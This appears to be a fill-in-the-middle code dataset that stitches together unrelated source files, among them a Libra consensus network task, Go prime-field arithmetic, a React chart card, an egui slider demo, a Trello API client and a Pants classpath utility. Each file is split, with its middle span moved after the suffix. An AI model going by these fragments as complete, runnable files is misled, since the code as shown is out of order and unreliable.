self_receiver: channel::Receiver<anyhow::Result<Event<ConsensusMsg>>>,
) -> (NetworkTask, NetworkReceivers) {
let (consensus_messages_tx, consensus_messages) = libra_channel::new(
QueueStyle::LIFO,
NonZeroUsize::new(1).unwrap(),
Some(&counters::CONSENSUS_CHANNEL_MSGS),
);
let (block_retrieval_tx, block_retrieval) = libra_channel::new(
QueueStyle::LIFO,
NonZeroUsize::new(1).unwrap(),
Some(&counters::BLOCK_RETRIEVAL_CHANNEL_MSGS),
);
let network_events = network_events.map_err(Into::<anyhow::Error>::into);
let all_events = Box::new(select(network_events, self_receiver));
(
NetworkTask {
consensus_messages_tx, | NetworkReceivers {
consensus_messages,
block_retrieval,
},
)
}
pub async fn start(mut self) {
while let Some(Ok(message)) = self.all_events.next().await {
match message {
Event::Message((peer_id, msg)) => {
if let Err(e) = self
.consensus_messages_tx
.push((peer_id, discriminant(&msg)), (peer_id, msg))
{
warn!(
"Error pushing consensus msg from {}, error: {:?}",
peer_id, e
);
}
}
Event::RpcRequest((peer_id, msg, callback)) => match msg {
ConsensusMsg::BlockRetrievalRequest(request) => {
debug!("Received block retrieval request {}", request);
let req_with_callback = IncomingBlockRetrievalRequest {
req: *request,
response_sender: callback,
};
if let Err(e) = self.block_retrieval_tx.push(peer_id, req_with_callback) {
warn!("libra channel closed: {:?}", e);
}
}
_ => {
warn!("Unexpected msg from {}: {:?}", peer_id, msg);
continue;
}
},
Event::NewPeer(peer_id) => {
debug!("Peer {} connected", peer_id);
}
Event::LostPeer(peer_id) => {
debug!("Peer {} disconnected", peer_id);
}
}
}
}
} | block_retrieval_tx,
all_events,
}, |
bubble.rs | //! Bubble Sort
//!
//! Repeatedly walks through the list of elements to be sorted, comparing each
//! pair of adjacent elements in turn and swapping them if they are in the
//! wrong order (e.g. largest first, or Z before A). The passes over the list
//! are repeated until no adjacent elements need to be swapped, at which point
//! the list is sorted.
//!
//! The algorithm takes its name from the way smaller elements gradually
//! "bubble" up to the top of the sequence (in ascending or descending order)
//! through successive swaps, much like carbon-dioxide bubbles in a fizzy
//! drink eventually rising to the top; hence "bubble sort".
//!
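//! A minimal usage sketch of the `sort` function defined below:
//!
//! ```ignore
//! let mut v = vec![5, 1, 4, 2, 8];
//! sort(&mut v);
//! assert_eq!(v, [1, 2, 4, 5, 8]);
//! ```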
use std::fmt::Debug;
pub fn sort<T>(a: &mut [T])
where
T: Ord + Debug,
{
let len = a.len();
for i in 0..len.saturating_sub(1) {
let mut swapped = false;
for j in 0..(len - 1 - i) {
if a[j] > a[j + 1] {
a.swap(j, j + 1);
swapped = true;
}
}
| if !swapped {
break;
}
}
} | println!("a: {:?}", a);
|
arith_generic.go | // Code generated by go generate; DO NOT EDIT.
// This file was generated by robots.
//go:build noasm || (!amd64 && !arm64)
// +build noasm !amd64,!arm64
package p503
import (
"math/bits"
"github.com/cloudflare/circl/dh/sidh/internal/common"
)
// Compute z = x + y (mod p).
func | (z, x, y *common.Fp) {
var carry uint64
// z=x+y % P503
for i := 0; i < FpWords; i++ {
z[i], carry = bits.Add64(x[i], y[i], carry)
}
// z = z - P503x2
carry = 0
for i := 0; i < FpWords; i++ {
z[i], carry = bits.Sub64(z[i], P503x2[i], carry)
}
// if z<0 add P503x2 back
mask := uint64(0 - carry)
carry = 0
for i := 0; i < FpWords; i++ {
z[i], carry = bits.Add64(z[i], P503x2[i]&mask, carry)
}
}
// Compute z = x - y (mod p).
func subP503(z, x, y *common.Fp) {
var borrow uint64
for i := 0; i < FpWords; i++ {
z[i], borrow = bits.Sub64(x[i], y[i], borrow)
}
mask := uint64(0 - borrow)
borrow = 0
for i := 0; i < FpWords; i++ {
z[i], borrow = bits.Add64(z[i], P503x2[i]&mask, borrow)
}
}
// If choice = 0, leave x unchanged. If choice = 1, sets x to y.
// If choice is neither 0 nor 1 then behaviour is undefined.
// This function executes in constant time.
func cmovP503(x, y *common.Fp, choice uint8) {
mask := 0 - uint64(choice)
for i := 0; i < FpWords; i++ {
x[i] ^= mask & (x[i] ^ y[i])
}
}
// Conditionally swaps bits in x and y in constant time.
// mask indicates bits to be swapped (set bits are swapped)
// For details see "Hackers Delight, 2.20"
//
// Implementation doesn't actually depend on a prime field.
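// Worked example (illustrative, using 4-bit values for brevity): for x = 0b1010,
// y = 0b0110 and mask = 1 the expanded mask is all ones, tmp = x ^ y = 0b1100,
// and the XORs below yield x = 0b0110 and y = 0b1010, i.e. a full swap. With
// mask = 0, tmp is zero and both values are left unchanged.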
func cswapP503(x, y *common.Fp, mask uint8) {
var tmp, mask64 uint64
mask64 = 0 - uint64(mask)
for i := 0; i < FpWords; i++ {
tmp = mask64 & (x[i] ^ y[i])
x[i] = tmp ^ x[i]
y[i] = tmp ^ y[i]
}
}
// Perform Montgomery reduction: set z = x R^{-1} (mod 2*p)
// with R=2^(FpWords*64). Destroys the input value.
func rdcP503(z *common.Fp, x *common.FpX2) {
var carry, t, u, v uint64
var hi, lo uint64
var count int
count = P503p1Zeros
for i := 0; i < FpWords; i++ {
for j := 0; j < i; j++ {
if j < (i - count + 1) {
hi, lo = bits.Mul64(z[j], P503p1[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
}
v, carry = bits.Add64(v, x[i], 0)
u, carry = bits.Add64(u, 0, carry)
t += carry
z[i] = v
v = u
u = t
t = 0
}
for i := FpWords; i < 2*FpWords-1; i++ {
if count > 0 {
count--
}
for j := i - FpWords + 1; j < FpWords; j++ {
if j < (FpWords - count) {
hi, lo = bits.Mul64(z[j], P503p1[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
}
v, carry = bits.Add64(v, x[i], 0)
u, carry = bits.Add64(u, 0, carry)
t += carry
z[i-FpWords] = v
v = u
u = t
t = 0
}
v, _ = bits.Add64(v, x[2*FpWords-1], 0)
z[FpWords-1] = v
}
// Compute z = x * y.
func mulP503(z *common.FpX2, x, y *common.Fp) {
var u, v, t uint64
var hi, lo uint64
var carry uint64
for i := uint64(0); i < FpWords; i++ {
for j := uint64(0); j <= i; j++ {
hi, lo = bits.Mul64(x[j], y[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
z[i] = v
v = u
u = t
t = 0
}
for i := FpWords; i < (2*FpWords)-1; i++ {
for j := i - FpWords + 1; j < FpWords; j++ {
hi, lo = bits.Mul64(x[j], y[i-j])
v, carry = bits.Add64(lo, v, 0)
u, carry = bits.Add64(hi, u, carry)
t += carry
}
z[i] = v
v = u
u = t
t = 0
}
z[2*FpWords-1] = v
}
// Compute z = x + y, without reducing mod p.
func adlP503(z, x, y *common.FpX2) {
var carry uint64
for i := 0; i < 2*FpWords; i++ {
z[i], carry = bits.Add64(x[i], y[i], carry)
}
}
// Reduce a field element in [0, 2*p) to one in [0,p).
func modP503(x *common.Fp) {
var borrow, mask uint64
for i := 0; i < FpWords; i++ {
x[i], borrow = bits.Sub64(x[i], P503[i], borrow)
}
// Sets all bits if borrow = 1
mask = 0 - borrow
borrow = 0
for i := 0; i < FpWords; i++ {
x[i], borrow = bits.Add64(x[i], P503[i]&mask, borrow)
}
}
// Compute z = x - y, without reducing mod p.
func sulP503(z, x, y *common.FpX2) {
var borrow, mask uint64
for i := 0; i < 2*FpWords; i++ {
z[i], borrow = bits.Sub64(x[i], y[i], borrow)
}
// Sets all bits if borrow = 1
mask = 0 - borrow
borrow = 0
for i := FpWords; i < 2*FpWords; i++ {
z[i], borrow = bits.Add64(z[i], P503[i-FpWords]&mask, borrow)
}
}
| addP503 |
SingleVisualizationComponent.js | import { useState, useEffect } from 'react';
import { Badge } from 'reactstrap';
import { Chart } from 'react-google-charts';
import { FontAwesomeIcon as Icon } from '@fortawesome/react-fontawesome';
import { faCalendar, faUser, faLink } from '@fortawesome/free-solid-svg-icons';
import SelfVisDataModel from 'libs/selfVisModel/SelfVisDataModel';
import moment from 'moment';
import Tippy from '@tippyjs/react';
import { RESOURCE_TYPE_ID } from 'constants/misc';
import ROUTES from 'constants/routes.js';
import { Link } from 'react-router-dom';
import { reverse } from 'named-urls';
import styled from 'styled-components';
import PropTypes from 'prop-types';
const VisualizationCard = styled.div`
margin: 0 2px;
cursor: pointer;
border: ${props => (!props.isHovered ? '1px solid rgb(219,221,229)' : '1px solid #e8616169')};
border-radius: 5px;
width: 220px;
`;
const DescriptionHeader = styled.div`
color: white;
background: ${props => props.theme.primary};
padding: 5px;
text-overflow: ellipsis;
&::selection,
&::-moz-selection {
color: ${props => props.theme.secondary};
background: ${props => props.theme.light} !important;
}
`;
const SingleVisualizationComponent = props => {
const getAvailableWidth = () => {
const item = document.getElementById('PreviewCarouselContainer');
return item?.clientWidth;
};
// get window dimensions to set the fullWidget into the center of the screen.
const width = getAvailableWidth();
const [isHovering, setIsHovering] = useState(false);
const [renderingData, setRenderingData] = useState(undefined);
const [windowHeight, setWindowHeight] = useState(0.5 * window.innerHeight);
const [windowWidth, setWindowWidth] = useState(0.8 * width);
const [selfVisModel] = useState(new SelfVisDataModel());
/** hover over a preview card handler -- currently disabled **/
const handleMouseEnter = () => {
// get window dimensions to set the fullWidget into the center of the screen.
const width = getAvailableWidth();
setIsHovering(true);
setWindowHeight(0.4 * window.innerHeight);
setWindowWidth(0.8 * width);
};
const handleMouseLeave = () => {
setIsHovering(false);
};
const visMethod = props.input.reconstructionModel.data.visMethod;
const customizationState = props.input.reconstructionModel.data.reconstructionData.customizationState;
useEffect(() => {
// we need to check if the data input for this component has changed; if so, apply the reconstruction model
const renderingData = selfVisModel.applyReconstructionModel(props.input.reconstructionModel);
setRenderingData(renderingData);
// eslint-disable-next-line react-hooks/exhaustive-deps
}, [props.input.reconstructionModel.orkgOrigin]);
return (
<Tippy
onShow={handleMouseEnter}
onHide={handleMouseLeave}
interactive={true}
placement="bottom"
theme="visualizationPreview"
maxWidth={windowWidth}
content={
<div
index={props.itemIndex}
style={{
overflow: 'hidden',
borderRadius: '4px',
width: windowWidth + 'px'
// height: windowHeight + 100 + 'px'
}}
>
<DescriptionHeader>
{props.input.label.length > 0 ? 'Title: ' + props.input.label : 'No Title'}
<Tippy content="Go to resource page">
<Link target="_blank" className="ml-2 resourceLink" to={reverse(ROUTES.RESOURCE, { id: props.input.id })}>
<Icon icon={faLink} color="#fff" />
</Link>
</Tippy>
</DescriptionHeader>
{isHovering && (
<Chart
chartType={visMethod}
data={renderingData}
width={windowWidth - 20 + 'px'}
height={windowHeight - 50 + 'px'}
options={{
showRowNumber: true,
width: '100%',
hAxis: {
title: visMethod === 'BarChart' ? customizationState.yAxisLabel : customizationState.xAxisLabel
},
vAxis: {
title: visMethod === 'BarChart' ? customizationState.xAxisLabel : customizationState.yAxisLabel
}
}}
/>
)}
<hr className="m-1" />
<div className="d-flex">
<div className="col-6 p-2 mb-2" style={{ borderRight: '2px solid #ddd' }}>
<b>Description:</b> <br /> <span>{props.input.description ? props.input.description : 'No Description'}</span>{' '}
</div>
<div className="col-6 p-2 mb-2">
<b>Meta Information:</b> <br />
<div className="mb-2">
<i>Created on: </i>
<span className="badge badge-light mr-2">
<Icon icon={faCalendar} className="text-primary" />{' '}
{props.input.created_at ? moment(props.input.created_at).format('dddd, MMMM Do YYYY') : ''}
</span> | <i>Created by: </i>
{props.input.authors.map(author => {
if (author && author.class === RESOURCE_TYPE_ID) {
return (
<Link
className="d-inline-block mr-2 mb-2"
to={reverse(ROUTES.AUTHOR_PAGE, { authorId: author.id })}
key={`author${author.id}`}
>
<Badge color="light">
<Icon icon={faUser} className="text-primary" /> {author.label}
</Badge>
</Link>
);
} else {
return (
<Badge key={`author${author.id}`} color="light" className="mr-2 mb-2">
<Icon icon={faUser} /> {author.label}
</Badge>
);
}
})}
</div>
)}
</div>
</div>
{!isHovering && <div style={{ width: windowWidth - 20 + 'px', height: windowHeight - 50 + 'px' }} />}
</div>
}
>
<VisualizationCard
onClick={() => {
selfVisModel.applyReconstructionModel(props.input.reconstructionModel);
props.expandVisualization(true);
}}
isHovered={isHovering}
id={`#Vis${props.input.reconstructionModel.orkgOrigin}`}
>
<div style={{ padding: '5px', pointerEvents: 'none', minWidth: '200px', minHeight: '100px' }}>
{renderingData && (
<Chart
chartType={visMethod}
data={renderingData}
width="200px"
height="100px"
options={{
width: '100%',
chartArea: { height: '50%' },
showRowNumber: true,
hAxis: {
title: visMethod === 'BarChart' ? customizationState.yAxisLabel : customizationState.xAxisLabel
},
vAxis: {
title: visMethod === 'BarChart' ? customizationState.xAxisLabel : customizationState.yAxisLabel
}
}}
/>
)}
</div>
</VisualizationCard>
</Tippy>
);
};
SingleVisualizationComponent.propTypes = {
input: PropTypes.object,
itemIndex: PropTypes.number,
expandVisualization: PropTypes.func
};
export default SingleVisualizationComponent; | </div>
{props.input.authors && props.input.authors.length > 0 && (
<div className="mb-2"> |
sliders.rs | use egui::*;
use std::f64::INFINITY;
/// Showcase sliders
#[derive(PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
#[cfg_attr(feature = "serde", serde(default))]
pub struct Sliders {
pub min: f64,
pub max: f64,
pub logarithmic: bool,
pub clamp_to_range: bool,
pub smart_aim: bool,
pub step: f64,
pub use_steps: bool,
pub integer: bool,
pub vertical: bool,
pub value: f64,
}
impl Default for Sliders {
fn default() -> Self {
Self {
min: 0.0,
max: 10000.0,
logarithmic: true,
clamp_to_range: false,
smart_aim: true,
step: 10.0,
use_steps: false,
integer: false,
vertical: false,
value: 10.0,
}
}
}
impl super::Demo for Sliders {
fn name(&self) -> &'static str | fn show(&mut self, ctx: &mut egui::Context, open: &mut bool) {
egui::Window::new(self.name())
.open(open)
.resizable(false)
.show(ctx, |ui| {
use super::View as _;
self.ui(ui);
});
}
}
impl super::View for Sliders {
fn ui(&mut self, ui: &mut Ui) {
let Self {
min,
max,
logarithmic,
clamp_to_range,
smart_aim,
step,
use_steps,
integer,
vertical,
value,
} = self;
ui.label("You can click a slider value to edit it with the keyboard.");
let (type_min, type_max) = if *integer {
((i32::MIN as f64), (i32::MAX as f64))
} else if *logarithmic {
(-INFINITY, INFINITY)
} else {
(-1e5, 1e5) // linear sliders make little sense with huge numbers
};
*min = min.clamp(type_min, type_max);
*max = max.clamp(type_min, type_max);
let orientation = if *vertical {
SliderOrientation::Vertical
} else {
SliderOrientation::Horizontal
};
let istep = if *use_steps { *step } else { 0.0 };
if *integer {
let mut value_i32 = *value as i32;
ui.add(
Slider::new(&mut value_i32, (*min as i32)..=(*max as i32))
.logarithmic(*logarithmic)
.clamp_to_range(*clamp_to_range)
.smart_aim(*smart_aim)
.orientation(orientation)
.text("i32 demo slider")
.step_by(istep),
);
*value = value_i32 as f64;
} else {
ui.add(
Slider::new(value, (*min)..=(*max))
.logarithmic(*logarithmic)
.clamp_to_range(*clamp_to_range)
.smart_aim(*smart_aim)
.orientation(orientation)
.text("f64 demo slider")
.step_by(istep),
);
ui.label(
"Sliders will intelligently pick how many decimals to show. \
You can always see the full precision value by hovering the value.",
);
if ui.button("Assign PI").clicked() {
self.value = std::f64::consts::PI;
}
}
ui.separator();
ui.label("Slider range:");
ui.add(
Slider::new(min, type_min..=type_max)
.logarithmic(true)
.smart_aim(*smart_aim)
.text("left"),
);
ui.add(
Slider::new(max, type_min..=type_max)
.logarithmic(true)
.smart_aim(*smart_aim)
.text("right"),
);
ui.separator();
ui.checkbox(use_steps, "Use steps");
ui.label("When enabled, the minimal value change would be restricted to a given step.");
if *use_steps {
ui.add(egui::DragValue::new(step).speed(1.0));
}
ui.separator();
ui.horizontal(|ui| {
ui.label("Slider type:");
ui.radio_value(integer, true, "i32");
ui.radio_value(integer, false, "f64");
})
.response
.on_hover_text("All numeric types (f32, usize, …) are supported.");
ui.horizontal(|ui| {
ui.label("Slider orientation:");
ui.radio_value(vertical, false, "Horizontal");
ui.radio_value(vertical, true, "Vertical");
});
ui.add_space(8.0);
ui.checkbox(logarithmic, "Logarithmic");
ui.label("Logarithmic sliders are great for when you want to span a huge range, i.e. from zero to a million.");
ui.label("Logarithmic sliders can include infinity and zero.");
ui.add_space(8.0);
ui.checkbox(clamp_to_range, "Clamp to range");
ui.label("If true, the slider will clamp incoming and outgoing values to the given range.");
ui.label("If false, the slider can shows values outside its range, and you can manually enter values outside the range.");
ui.add_space(8.0);
ui.checkbox(smart_aim, "Smart Aim");
ui.label("Smart Aim will guide you towards round values when you drag the slider so you you are more likely to hit 250 than 247.23");
ui.add_space(8.0);
ui.vertical_centered(|ui| {
egui::reset_button(ui, self);
ui.add(crate::egui_github_link_file!());
});
}
}
| {
"⬌ Sliders"
}
|
exp_len.py | #!/usr/bin/python
import sys
import os
if len(sys.argv) >= 3 :
filename = sys.argv[1]
refFlat_filename = sys.argv[2]
else:
print("usage: python exp_len.py refSeq_MLE_output.tab known.gpd")
print("or ./exp_len.py refSeq_MLE_output.tab known.gpd")
sys.exit(1)
################################################################################
file = open(filename,'r')
row_i = 3
dt = {}
for line in file:
ls=line.strip().split('\t')
dt[ ls[0] ] = ls[1]
file.close()
################################################################################
used_set=set()
ref=open(refFlat_filename,'r')
len_dt={}
for refline in ref:
refline_list=refline.strip().split()
exon_start_list=refline_list[9].strip(',').split(',')
exon_end_list=refline_list[10].strip(',').split(',')
L = 0
i=0
for start in exon_start_list:
start =int(start)
end = int(exon_end_list[i])
L += (end - start)
i += 1
if refline_list[1] in used_set:
continue
else:
|
if refline_list[1] in dt:
print(refline_list[0] + "\t" + refline_list[1] + "\t" + str(L) + "\t" + str(dt[refline_list[1]]))
else:
print(refline_list[0] + "\t" + refline_list[1] + "\t" + str(L) + "\t" + "0")
################################################################################
| used_set.add(refline_list[1]) |
asd.py | from ciscosupportsdk.apisession import ApiSession
SERVICE_BASE_URL = "/software/v4.0"
class AutomatedSoftwareDistributionApi(object):
"""
Cisco Automated Software Distribution service provides software
information and download URLs to assist you in upgrading your
device/application to the latest version.
"""
def __init__(self, session: ApiSession) -> None:
self._session = session
def get_bug_details(self, bug_ids: list[str]) -> None:
| """
Returns detailed information for the specified bug ID or IDs.
:param: bug_ids: list[str]: Identifier of the bug or bugs for which
to return detailed information. A maximum of five (5) bug IDs can
be submitted separated by a comma.
:rtype: Bug
"""
path = f"{SERVICE_BASE_URL}/bug_ids/" f"{','.join(bug_ids)}"
print(path)
pass |
|
Trello.js | const axios = require('axios');
const {Datastore} = require('@google-cloud/datastore');
const Slack = require('./Slack');
const datastore = new Datastore();
const config = {
"list": {
"incoming": "",
"approved": "",
"rejected": ""
},
"key": process.env.TRELLO_KEY,
"token": process.env.TRELLO_TOKEN,
"board": process.env.TRELLO_BOARD
};
class | {
constructor() {
this.board = config.board;
this.lists = {};
this.cfields = {};
this.authParams = `?key=${config.key}&token=${config.token}`;
}
async init() {
await this.initLists();
await this.initFields();
}
async initLists() {
try {
const res = await axios.get(`https://api.trello.com/1/boards/${this.board}/lists${this.authParams}`);
res.data.forEach(obj => {
this.lists[obj.name.toLowerCase()] = obj.id;
});
} catch (err) {
console.error(`[E] Couldn't get lists from Trello: ${err.message}`);
}
}
async initFields() {
try {
const res = await axios.get(`https://api.trello.com/1/boards/${this.board}/customFields${this.authParams}`);
res.data.forEach(obj => {
this.cfields[obj.name.toLowerCase().replace(/\s.*/, '')] = obj.id;
});
} catch (err) {
console.error(`[E] Couldn't get custom fields from Trello: ${err.message}`);
}
}
async newCard(formFields) {
const reqUri = `https://api.trello.com/1/cards${this.authParams}&pos=bottom&idList=${this.lists.incoming}`;
try {
const dataStoreEntity = this.formFieldsDataStoreEntity(formFields);
console.log(`[D] Store into data store ${JSON.stringify(dataStoreEntity)}`);
await this.storeEntity(dataStoreEntity);
const res = await axios.post(reqUri, this.formFieldsTrelloCardData(formFields));
dataStoreEntity.data.trelloId = res.data.id;
await this.storeEntity(dataStoreEntity);
this.addFields(res.data.id, formFields);
const slack = new Slack();
await slack.newMessage(formFields.name, res.data.shortUrl);
} catch (err) {
console.error(`[E] Error while creating Trello card: ${err.message} (${reqUri})`);
return err;
}
}
async addFields(cardId, formFields) {
const formCustomFields = {...formFields};
delete formCustomFields.request;
const requests = [];
Object.keys(formCustomFields).forEach(fieldName => {
if (formCustomFields[fieldName] === '') {
return;
}
const fieldId = this.cfields[fieldName];
const value = {
"value": {
"text": formCustomFields[fieldName]
},
"key": config.key,
"token": config.token
};
requests.push([`https://api.trello.com/1/card/${cardId}/customField/${fieldId}/item`, value, fieldName]);
});
for (const req of requests) {
const uri = req[0];
const data = req[1];
const fieldName = req[2];
try {
await axios.put(uri, data);
} catch (err) {
console.error(`[E] Failed to update custom field "${fieldName}" on card ${cardId}: ${err.message}`);
}
}
}
formFieldsDataStoreEntity(formFields) {
const key = datastore.key('request');
return {
key: key,
data: {
request: formFields,
createdOn: new Date().toUTCString(),
region: formFields.location,
trelloId: null
}
};
}
formFieldsTrelloCardData(formFields) {
const maxContentLen = 160;
const requestContent = formFields.request
.replace(/(?:\r\n|\r|\n)/g, '; ');
return {
name: requestContent.length > maxContentLen
? requestContent.substring(0, maxContentLen - 3) + '...'
: requestContent,
desc: requestContent
};
}
async storeEntity(requestEntity) {
return datastore.save(requestEntity, (err, apiResponse) => {
if (err) {
console.error(`[E] Error while storing into data store: ${err.message} [${JSON.stringify(requestEntity)}]`);
}
});
}
}
module.exports = Trello;
| Trello |
classpath_util.py | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import itertools
import os
from collections import OrderedDict
from twitter.common.collections import OrderedSet
from pants.util.contextutil import open_zip
from pants.util.dirutil import fast_relpath, safe_walk
from pants.util.strutil import ensure_text
class ClasspathUtil(object):
@classmethod
def compute_classpath(cls, targets, classpath_products, extra_classpath_tuples, confs):
"""Return the list of classpath entries for a classpath covering the passed targets.
Filters and adds paths from extra_classpath_tuples to the end of the resulting list.
:param targets: The targets to generate a classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param extra_classpath_tuples: Additional classpath entries.
:param confs: The list of confs for use by this classpath.
:returns: The classpath as a list of path elements.
:rtype: list of string
"""
classpath_iter = cls._classpath_iter(targets, classpath_products, confs=confs)
total_classpath = OrderedSet(classpath_iter)
filtered_extra_classpath_iter = cls._filtered_classpath_by_confs_iter(extra_classpath_tuples,
confs)
extra_classpath_iter = cls._entries_iter(filtered_extra_classpath_iter)
total_classpath.update(extra_classpath_iter)
return list(total_classpath)
@classmethod
def classpath(cls, targets, classpath_products, confs=('default',)):
"""Return the classpath as a list of paths covering all the passed targets.
:param targets: Targets to build an aggregated classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: The classpath as a list of path elements.
:rtype: list of string
"""
classpath_iter = cls._classpath_iter(targets, classpath_products, confs=confs)
return list(classpath_iter)
@classmethod
def _classpath_iter(cls, targets, classpath_products, confs=('default',)):
classpath_tuples = classpath_products.get_for_targets(targets)
filtered_tuples_iter = cls._filtered_classpath_by_confs_iter(classpath_tuples, confs)
return cls._entries_iter(filtered_tuples_iter)
@classmethod
def internal_classpath(cls, targets, classpath_products, confs=('default',)):
"""Return the list of internal classpath entries for a classpath covering all `targets`.
Any classpath entries contributed by external dependencies will be omitted.
:param targets: Targets to build an aggregated classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: The classpath as a list of path elements.
:rtype: list of string
"""
classpath_tuples = classpath_products.get_internal_classpath_entries_for_targets(targets)
filtered_tuples_iter = cls._filtered_classpath_by_confs_iter(classpath_tuples, confs)
return [entry.path for entry in cls._entries_iter(filtered_tuples_iter)]
@classmethod
def classpath_by_targets(cls, targets, classpath_products, confs=('default',)):
"""Return classpath entries grouped by their targets for the given `targets`.
:param targets: The targets to lookup classpath products for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: The ordered (target, classpath) mappings.
:rtype: OrderedDict
"""
classpath_target_tuples = classpath_products.get_product_target_mappings_for_targets(targets)
filtered_items_iter = itertools.ifilter(cls._accept_conf_filter(confs, lambda x: x[0][0]),
classpath_target_tuples)
# group (classpath_entry, target) tuples by targets
target_to_classpath = OrderedDict()
for classpath_entry, target in filtered_items_iter:
_, entry = classpath_entry
if not target in target_to_classpath:
target_to_classpath[target] = []
target_to_classpath[target].append(entry)
return target_to_classpath
@classmethod
def _accept_conf_filter(cls, confs, unpack_func=None):
def accept_conf_in_item(item):
conf = unpack_func(item)
return confs is None or conf in confs
unpack_func = unpack_func or (lambda x: x)
return accept_conf_in_item
@classmethod
def _filtered_classpath_by_confs_iter(cls, classpath_tuples, confs):
|
@classmethod
def _entries_iter(cls, classpath):
for conf, entry in classpath:
yield entry
@classmethod
def classpath_contents(cls, targets, classpath_products, confs=('default',)):
"""Provide a generator over the contents (classes/resources) of a classpath.
:param targets: Targets to iterate the contents classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: An iterator over all classpath contents, one directory, class or resource relative
path per iteration step.
:rtype: :class:`collections.Iterator` of string
"""
classpath_iter = cls._classpath_iter(targets, classpath_products, confs=confs)
for f in cls.classpath_entries_contents(classpath_iter):
yield f
@classmethod
def classpath_entries_contents(cls, classpath_entries):
"""Provide a generator over the contents (classes/resources) of a classpath.
Subdirectories are included and differentiated via a trailing forward slash (for symmetry
across ZipFile.namelist and directory walks).
:param classpath_entries: A sequence of classpath_entries. Non-jars/dirs are ignored.
:returns: An iterator over all classpath contents, one directory, class or resource relative
path per iteration step.
:rtype: :class:`collections.Iterator` of string
"""
for entry in classpath_entries:
if cls.is_jar(entry):
# Walk the jar namelist.
with open_zip(entry, mode='r') as jar:
for name in jar.namelist():
yield ensure_text(name)
elif os.path.isdir(entry):
# Walk the directory, including subdirs.
def rel_walk_name(abs_sub_dir, name):
return fast_relpath(os.path.join(abs_sub_dir, name), entry)
for abs_sub_dir, dirnames, filenames in safe_walk(entry):
for name in dirnames:
yield '{}/'.format(rel_walk_name(abs_sub_dir, name))
for name in filenames:
yield rel_walk_name(abs_sub_dir, name)
else:
# non-jar and non-directory classpath entries should be ignored
pass
@classmethod
def classname_for_rel_classfile(cls, class_file_name):
"""Return the class name for the given relative-to-a-classpath-entry file, or None."""
if not class_file_name.endswith('.class'):
return None
return class_file_name[:-len('.class')].replace('/', '.')
@classmethod
def is_jar(cls, path):
"""True if the given path represents an existing jar or zip file."""
return path.endswith(('.jar', '.zip')) and os.path.isfile(path)
@classmethod
def is_dir(cls, path):
"""True if the given path represents an existing directory."""
return os.path.isdir(path)
| filter_func = cls._accept_conf_filter(confs, unpack_func=lambda x: x[0])
return itertools.ifilter(filter_func, classpath_tuples) |
forward_models.py | """
Package defining various dynamic forward models as well as convenience methods to generate the
right hand sides (RHS) of the related partial differential equations.
Currently, the following forward models are implemented:
#. An advection equation for images
#. An advection equation for maps
#. The EPDiff-equation parameterized using the vector-valued momentum for images
#. The EPDiff-equation parameterized using the vector-valued momentum for maps
#. The EPDiff-equation parameterized using the scalar-valued momentum for images
#. The EPDiff-equation parameterized using the scalar-valued momentum for maps
The images are expected to be tensors of dimension: BxCxXxYxZ (or BxCxX in 1D and BxCxXxY in 2D),
where B is the batch-size, C the number of channels, and X, Y, and Z are the spatial coordinate indices.
Furthermore, the following RHSs are provided
#. Image advection
#. Map advection
#. Scalar conservation law
#. EPDiff
"""
from __future__ import print_function
from __future__ import absolute_import
from builtins import range
from builtins import object
from abc import ABCMeta, abstractmethod
import numpy as np
from . import finite_differences_multi_channel as fdm
from . import utils
from .data_wrapper import MyTensor
from future.utils import with_metaclass
import torch.nn as nn
import torch
class RHSLibrary(object):
"""
Convenience class to quickly generate various right hand sides (RHSs) of popular partial differential
equations. In this way new forward models can be written with minimal code duplication.
"""
def __init__(self, spacing, use_neumann_BC_for_map=False):
"""
Constructor
:param spacing: Spacing for the images. This will be an array with 1, 2, or 3 entries in 1D, 2D, and 3D respectively.
"""
self.spacing = spacing
"""spatial spacing"""
self.spacing_min = np.min(spacing)
""" min of the spacing"""
self.spacing_ratio = spacing/self.spacing_min
self.fdt_ne = fdm.FD_torch_multi_channel(spacing,mode='neumann_zero')
"""torch finite differencing support neumann zero"""
self.fdt_le = fdm.FD_torch_multi_channel( spacing, mode='linear')
"""torch finite differencing support linear extrapolation"""
self.fdt_di = fdm.FD_torch_multi_channel(spacing, mode='dirichlet_zero')
"""torch finite differencing support dirichlet zero"""
self.dim = len(self.spacing)
"""spatial dimension"""
self.use_neumann_BC_for_map = use_neumann_BC_for_map
"""If True uses zero Neumann boundary conditions also for evolutions of the map, if False uses linear extrapolation"""
def rhs_advect_image_multiNC(self,I,v):
'''
Advects a batch of images which can be multi-channel. Expected image format here, is
BxCxXxYxZ, where B is the number of images (batch size), C, the number of channels
per image and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
:math:`-\\nabla I^Tv`
:param I: Image batch BxCIxXxYxZ
:param v: Velocity fields (this will be one velocity field per image) BxCxXxYxZ
:return: Returns the RHS of the advection equations involved BxCxXxYxZ
'''
rhs_ret= self._rhs_advect_image_multiN(I, v )
return rhs_ret
def _rhs_advect_image_multiN(self,I,v):
"""
:param I: One-channel input image: Bx1xXxYxZ
:param v: velocity field BxCxXxYxZ
:return: Returns the RHS of the advection equation for one channel BxXxYxZ
"""
if self.dim == 1:
rhs_ret = -self.fdt_ne.dXc(I) * v[:,0:1]
elif self.dim == 2:
rhs_ret = -self.fdt_ne.dXc(I) * v[:,0:1] -self.fdt_ne.dYc(I)*v[:,1:2]
elif self.dim == 3:
